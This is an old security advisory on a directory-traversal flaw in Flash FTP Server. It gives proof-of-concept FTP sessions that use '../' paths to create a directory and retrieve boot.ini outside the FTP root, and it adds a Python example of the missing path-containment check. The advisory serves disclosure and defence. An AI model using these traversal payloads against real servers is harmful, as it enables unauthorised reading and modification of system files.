Reported January 5, 2004 by dr insane.

 

 

VERSIONS AFFECTED

 

· Flash FTP Server 1.0 and 2.1

 

DESCRIPTION

 

Flash FTP Server contains a directory-traversal vulnerability. By passing paths that contain ../ sequences to FTP commands (as outlined in the demonstration below), an attacker can read or modify files and directories that reside anywhere on the vulnerable system.

DEMONSTRATION

The discoverer posted the following demonstration as proof of concept:

Creation of a directory outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
pwd
257 "/C:/ftp_root/" is current directory.
mkd /../../../../../../../owned
257 'C:\..\..\..\..\..\..\..\owned': directory created.


Retrieval of a file outside the bounding FTP root directory:
220 Flash FTP Server v2.1 ready...
user anonymous
331 Password required for anonymous.
pass
230 User anonymous logged in.
ftp> get /../../../../../../../../boot.ini
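The containment check that the demonstration above shows to be missing, as an added Python example; it is not code from the advisory, the discoverer or the vendor. The names resolve and PathEscape are hypothetical, the root C:\ftp_root is taken from the PWD reply above, and the example goes beyond the two demonstrated arguments by also covering backslash separators, drive-letter paths and sibling directories that share the root's prefix.

```python
import ntpath  # Windows path rules; importable on any OS

FTP_ROOT = r"C:\ftp_root"  # from the PWD reply in the advisory


class PathEscape(Exception):
    """A client-supplied path resolved outside the FTP root."""


def resolve(client_path, cwd="/", root=FTP_ROOT):
    """Map an FTP path argument to a local path inside root, or raise."""
    if "\x00" in client_path:
        raise PathEscape("NUL byte in path")
    # The server runs on Windows, so "\" is a separator too.
    virtual = client_path.replace("\\", "/")
    if not virtual.startswith("/"):
        virtual = cwd.rstrip("/") + "/" + virtual
    # Join below the root, then collapse "." and ".." lexically.
    candidate = ntpath.normpath(ntpath.join(root, virtual.lstrip("/")))
    # Compare whole components, case-insensitively as NTFS does, so that
    # C:\ftp_root_backup is not mistaken for a child of C:\ftp_root.
    root_n = ntpath.normcase(ntpath.normpath(root))
    cand_n = ntpath.normcase(candidate)
    if cand_n != root_n and not cand_n.startswith(root_n + "\\"):
        raise PathEscape(f"{client_path!r} resolves to {candidate!r}")
    return candidate


if __name__ == "__main__":
    # First two arguments are from the advisory; the rest are constructed.
    for arg in ["/../../../../../../../owned",
                "/../../../../../../../../boot.ini",
                "..\\..\\boot.ini", "/C:/Windows/win.ini",
                "/../ftp_root_backup/x", "pub/readme.txt"]:
        try:
            print("ALLOW ", arg, "->", resolve(arg))
        except PathEscape as exc:
            print("REJECT", exc)
```

The check is lexical only: it does not follow symbolic links or junctions, so a server would also need to resolve the final on-disk path before comparing it with the root.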

 

VENDOR RESPONSE

 

NET2SOFT (http://www.net2soft.com/) has been notified.

 

CREDIT

Discovered by dr_insane.